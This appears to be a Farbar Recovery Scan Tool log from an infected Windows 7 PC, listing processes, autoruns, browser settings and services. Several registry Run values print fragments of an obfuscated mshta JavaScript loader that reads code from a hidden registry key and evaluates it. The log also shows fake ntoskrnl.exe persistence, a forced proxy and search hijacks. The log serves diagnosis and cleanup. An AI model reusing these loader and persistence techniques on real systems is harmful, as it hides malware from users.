Virus Test

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:11-07-2015
Ran by User (administrator) on USER-PC on 11-07-2015 20:08:13
Running from C:\Users\User\Desktop
Loaded Profiles: User (Available Profiles: User)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
() C:\Windows\Installer\MSI5D22.tmp
(AMD) C:\Windows\System32\atieclxx.exe
(ArcSoft, Inc.) C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(AnchorFree Inc.) C:\Program Files (x86)\Hotspot Shield\bin\cmw_srv.exe
() C:\Program Files (x86)\Hotspot Shield\bin\hsswd.exe
(iOSinstaller.com) C:\Program Files (x86)\iOSinstaller\Updater.exe
(NVIDIA) C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe
() C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
(Microsoft Corporation) C:\Windows\System32\wsqmcons.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Razer Inc.) C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
() C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
() C:\Users\User\AppData\Roaming\Microsoft\Windows\IEUpdate\ntoskrnl.exe
() C:\Users\User\AppData\Roaming\Microsoft\Windows\IEUpdate\ntoskrnl.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\PresentationHost.exe
Failed to access process -> conhost.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [558496 2014-02-27] (Adobe Systems Incorporated)
HKLM\...\Run: [Bluetooth HCI Monitor] => RunDll32 HCIMNTR.DLL,RunCheckHCIMode
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [169768 2015-02-13] (Apple Inc.)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2691480 2014-03-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Razer Synapse] => C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [585536 2014-11-03] (Razer Inc.)
HKLM-x32\...\Run: [**0a645ebd<*>] => mshta javascript:SdJ3saJg0="RL9G6pREw7";l3o5=new%20ActiveXObject("WScript.Shell");MLf7fIKW6="yucoXkwmEf";WDO4e8=l3o5.RegRead("HKLM\\software\\Wow6432Node\\3a7e1f91\\9c64e118");j6qc5rpdDc="2xQJoo7";eva (the data entry has 26 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Policies\Explorer\Run: [] =>
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1
HKLM\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\Run: [Google Update] => C:\Users\User\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2014-03-15] (Google Inc.)
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\Run: [ManyCam] => C:\Program Files (x86)\ManyCam\ManyCam.exe [8473064 2014-03-26] (Visicom Media Inc.)
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\Run: [uTorrent] => C:\Users\User\AppData\Roaming\uTorrent\uTorrent.exe [1694560 2015-05-14] (BitTorrent Inc.)
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [31087200 2015-01-23] (Skype Technologies S.A.)
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\Run: [Adrvworks] => C:\Users\User\AppData\Local\Adrvworks\tmp9C07.exe [172032 2015-05-05] (Layananda3)
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\Run: [YrnsPack] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\User\AppData\Local\Adrvworks\sxbkovrb.dll
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\Run: [Etsltion] => regsvr32.exe C:\Users\User\AppData\Local\Etsltion\xqgdodvs.dll <===== ATTENTION
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\Run: [**0a645ebd<*>] => mshta javascript:wWYAmV4j7="oLW";Mb6=new%20ActiveXObject("WScript.Shell");ODXPJx1E4N="AWEp";r2pZg=Mb6.RegRead("HKCU\\software\\3a7e1f91\\9c64e118");eo9F5BcQw="BmEt7DIFSF";eval(r2pZg);QagpyC3Jl="Acr2kk (the data entry has 2 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\Run: [ProxyGate] => C:\Users\User\AppData\Roaming\ProxyGate\MainService.exe [1143248 2015-04-01] (Gold Click Ltd)
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\Run: [ntoskrnl] => C:\Users\User\AppData\Roaming\Microsoft\Windows\IEUpdate\ntoskrnl.exe [57344 2015-04-27] ()
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\Run: [MicrosoftUpdate] => C:\Users\User\AppData\Roaming\ChromeUpdate\GoogleUpdate.exe [65024 2015-06-03] (Google Inc.)
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\Run: [ChromeUpdate] => C:\Users\User\AppData\Roaming\ChromeUpdate\GoogleUpdate.exe [65024 2015-06-03] (Google Inc.)
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\Run: [7af1e2] => C:\7af1e26\7af1e26.exe [258560 2015-06-03] ()
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\Run: [7af1e26] => C:\Users\User\AppData\Roaming\7af1e26.exe [252928 2015-06-03] ()
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\CurrentVersion\Windows: [Load] C:\ProgramData\mscovrb.exe <===== ATTENTION
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\Policies\Explorer: [Run] "C:\Users\User\AppData\Roaming\Microsoft\Windows\IEUpdate\ntoskrnl.exe"
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\Policies\Explorer: [TaskbarNoNotification] 1
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\MountPoints2: L - L:\LaunchU3.exe -a
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\Command Processor: C:\Users\User\AppData\Roaming\Microsoft\Windows\IEUpdate\ntoskrnl.exe [57344 2015-04-27] () <===== ATTENTION!
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Users\User\AppData\Roaming\Microsoft\Windows\IEUpdate\ntoskrnl.exe [57344 2015-04-27] ()
Startup: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7af1e26.exe [2015-06-03] ()
Startup: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk [2015-05-30]
ShortcutTarget: ntoskrnl.lnk -> C:\Users\User\AppData\Roaming\Microsoft\Windows\IEUpdate\ntoskrnl.exe ()
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-03-20] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-03-20] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-03-20] ()
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2015-05-05] ()
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyServer: [S-1-5-21-2017399490-4096563441-3607321274-1000] => 178.63.68.84:8080
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.trovi.com/?gd=&ctid=CT3320133&octid=EB_ORIGINAL_CTID&ISID=C6ED29B6-B2B4-438C-B215-2C602D80A2D0&SearchSource=55&CUI=&UM=6&UP=SPAD73446F-85FD-43C7-8412-9A807DB158B2&SSPV=
HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/
SearchScopes: HKLM -> {31090377-0740-419E-BEFC-A56E50500D5B} URL =
SearchScopes: HKLM-x32 -> DefaultScope value is missing
SearchScopes: HKU\S-1-5-21-2017399490-4096563441-3607321274-1000 -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = http://www.trovi.com/Results.aspx?gd=&ctid=CT3320133&octid=EB_ORIGINAL_CTID&ISID=C6ED29B6-B2B4-438C-B215-2C602D80A2D0&SearchSource=58&CUI=&UM=6&UP=SPAD73446F-85FD-43C7-8412-9A807DB158B2&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-2017399490-4096563441-3607321274-1000 -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = http://www.trovi.com/Results.aspx?gd=&ctid=CT3320133&octid=EB_ORIGINAL_CTID&ISID=C6ED29B6-B2B4-438C-B215-2C602D80A2D0&SearchSource=58&CUI=&UM=6&UP=SPAD73446F-85FD-43C7-8412-9A807DB158B2&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-2017399490-4096563441-3607321274-1000 -> {31090377-0740-419E-BEFC-A56E50500D5B} URL = http://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=599486&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2017399490-4096563441-3607321274-1000 -> {9D65E64B-AA94-4CBB-80C7-9021F0009B5F} URL = http://speedial.com/results.php?f=4&q={searchTerms}&a=spd_app_14_26_ch&cd=2XzuyEtN2Y1L1QzuyB0AyBzytCzy0Bzz0B0EtDzzyEyB0DyDtN0D0Tzu0SzytDyCtN1L2XzutBtFtBtCtFtCtDtFtDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StB0CtAtD0EyE0CyDtG0DtBtAyEtGyCyDyE0EtG0EyD0B0EtGtDyB0FtAzytA0BtA0F0BtCyE2QtN1M1F1B2Z1V1N2Y1L1Qzu2StB0F0EyD0C0EzyyCtGtAyDyByDtGyE0Ezy0FtGzy0CtAyBtGtB0EyC0DtA0A0FyEyByEyCtD2Q&cr=1738801789&ir=
SearchScopes: HKU\S-1-5-21-2017399490-4096563441-3607321274-1000 -> {DECA3892-BA8F-44b8-A993-A466AD694AE4} URL = http://search.yahoo.com/search?p={searchTerms}
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2015-03-31] (Microsoft Corporation)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2014-12-20] (Oracle Corporation)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-05-01] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2015-04-14] (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2014-12-20] (Oracle Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2015-03-31] (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-05-01] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2015-04-14] (Microsoft Corporation)
DPF: HKLM-x32 {74DBCB52-F298-4110-951D-AD2FF67BC8AB} http://www.nvidia.com/content/DriverDownload/nforce/NvidiaSmartScan.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/flashplayer/current/swflash.cab
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2014-03-12] (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-05-01] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-05-01] (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76 192.168.1.1
Tcpip\..\Interfaces\{252041B5-5314-4CE7-BEC7-2B76BE60F4FA}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{2FB483D0-CFDD-4DD9-A298-4E97FCB7922B}: [DhcpNameServer] 75.75.75.75 75.75.76.76 192.168.1.1
Tcpip\..\Interfaces\{5E813BFC-21DD-4D80-A5A6-0EAC5E98C060}: [DhcpNameServer] 75.75.75.75 75.75.76.76 192.168.1.1
Tcpip\..\Interfaces\{AB1A967D-1F4A-4917-AA03-458FA8475145}: [DhcpNameServer] 172.20.10.1
Tcpip\..\Interfaces\{CF4E329F-303B-446F-B56A-F37BE6C71C43}: [DhcpNameServer] 8.8.8.8
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\hy7s5svb.default
FF Plugin: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-12-20] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2014-12-20] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MIF5BA~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MIF5BA~1\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect_x86_64 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2014-03-21] (Adobe Systems)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1212152.dll [2014-05-30] (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
FF Plugin-x32: @esn/esnlaunch,version=2.1.7 -> C:\Program Files (x86)\Battlelog Web Plugins\2.1.7\npesnlaunch.dll [2013-05-30] (ESN Social Software AB)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-03-31] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-30] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll [2013-12-06] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll [2013-12-06] (Google Inc.)
FF Plugin-x32: @unity3d.com/UnityPlayer -> C:\Program Files (x86)\Unity\WebPlayer\loader\npUnity3D32.dll [2014-12-18] (Unity Technologies ApS)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0-rc2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll No File
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2012-07-27] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2014-03-21] (Adobe Systems)
FF Plugin HKU\S-1-5-21-2017399490-4096563441-3607321274-1000: @talk.google.com/GoogleTalkPlugin -> C:\Users\User\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll [2014-03-05] (Google)
FF Plugin HKU\S-1-5-21-2017399490-4096563441-3607321274-1000: @talk.google.com/O1DPlugin -> C:\Users\User\AppData\Roaming\Mozilla\plugins\npo1d.dll [2014-03-05] (Google)
FF Plugin HKU\S-1-5-21-2017399490-4096563441-3607321274-1000: @talk.google.com/O3DPlugin -> C:\Users\User\AppData\Roaming\Mozilla\plugins\npgtpo3dautoplugin.dll [2014-03-05] ()
FF Plugin HKU\S-1-5-21-2017399490-4096563441-3607321274-1000: @tools.google.com/Google Update;version=3 -> C:\Users\User\AppData\Local\Google\Update\1.3.22.5\npGoogleUpdate3.dll [2014-03-15] (Google Inc.)
FF Plugin HKU\S-1-5-21-2017399490-4096563441-3607321274-1000: @tools.google.com/Google Update;version=9 -> C:\Users\User\AppData\Local\Google\Update\1.3.22.5\npGoogleUpdate3.dll [2014-03-15] (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2015-03-31] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Users\User\AppData\Roaming\mozilla\plugins\npgoogletalk.dll [2014-03-05] (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\User\AppData\Roaming\mozilla\plugins\npgtpo3dautoplugin.dll [2014-03-05] ()
FF Plugin ProgramFiles/Appdata: C:\Users\User\AppData\Roaming\mozilla\plugins\npo1d.dll [2014-03-05] (Google)
FF Extension: 	Play Pickle TextLinks		 - C:\Users\User\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\textlinks@plpickle.com [2011-04-27]
FF Extension: Library Description - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\hy7s5svb.default\Extensions\{FE5A3CED-D9E8-D65E-2399-BF95ABF2DEC6} [2015-05-05]
FF Extension: Tamper Data - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\hy7s5svb.default\Extensions\{9c51bd27-6ed8-4000-a2bf-36cb95c0c947}.xpi [2015-02-02]
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2011-02-11]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt

Chrome:
=======
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Library Description) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajpgkpeckebdhofmmjfgcjjiiejpodla [2015-05-05]
CHR Extension: (Google Docs) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-04-16]
CHR Extension: (No Name) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-02-07]
CHR Extension: (YouTube) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-04-16]
CHR Extension: (Google Search) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-04-16]
CHR Extension: (Skype Click to Call) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2014-08-24]
CHR Extension: (Google Wallet) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-05]
CHR Extension: (Gmail) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-16]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-05-01]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ADExchange; C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe [43072 2012-03-19] (ArcSoft, Inc.)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77128 2015-01-19] (Apple Inc.)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1394816 2015-05-01] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1772672 2015-05-01] (Microsoft Corporation)
S3 Creative Audio Engine Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [79360 2013-12-10] (Creative Labs) [File not signed]
R2 CTAudSvcService; C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe [286720 2010-02-12] (Creative Technology Ltd) [File not signed]
R3 HomeGroupListener; C:\Windows\system32\ListSvc.dll [232448 2010-11-20] (Microsoft Corporation) [File not signed]
R3 HomeGroupProvider; C:\Windows\system32\provsvc.dll [187904 2010-11-20] (Microsoft Corporation) [File not signed]
R3 HomeGroupProvider; C:\Windows\SysWOW64\provsvc.dll [165376 2010-11-20] (Microsoft Corporation) [File not signed]
R2 hshld; C:\Program Files (x86)\Hotspot Shield\bin\cmw_srv.exe [919040 2014-05-16] (AnchorFree Inc.) [File not signed]
S3 HssTrayService; C:\Program Files (x86)\Hotspot Shield\bin\HssTrayService.EXE [78512 2014-05-16] ()
R2 HssWd; C:\Program Files (x86)\Hotspot Shield\bin\hsswd.exe [430344 2014-05-16] ()
R2 HyperDeskCustomThemeEnabler; C:\Windows\Installer\MSI5D22.tmp [102400 2013-12-12] () [File not signed]
R2 iOSinstallerUpdater; C:\Program Files (x86)\iOSinstaller\updater.exe [165376 2015-04-08] (iOSinstaller.com) [File not signed]
S2 MSSQL$SQLEXPRESS; C:\Program Files (x86)\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe [40999448 2008-07-10] (Microsoft Corporation)
S3 NMIndexingService; C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexingService.exe [279848 2007-06-27] (Nero AG)
R2 nTuneService; C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe [216576 2008-05-30] (NVIDIA) [File not signed]
R2 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [186048 2014-12-09] ()
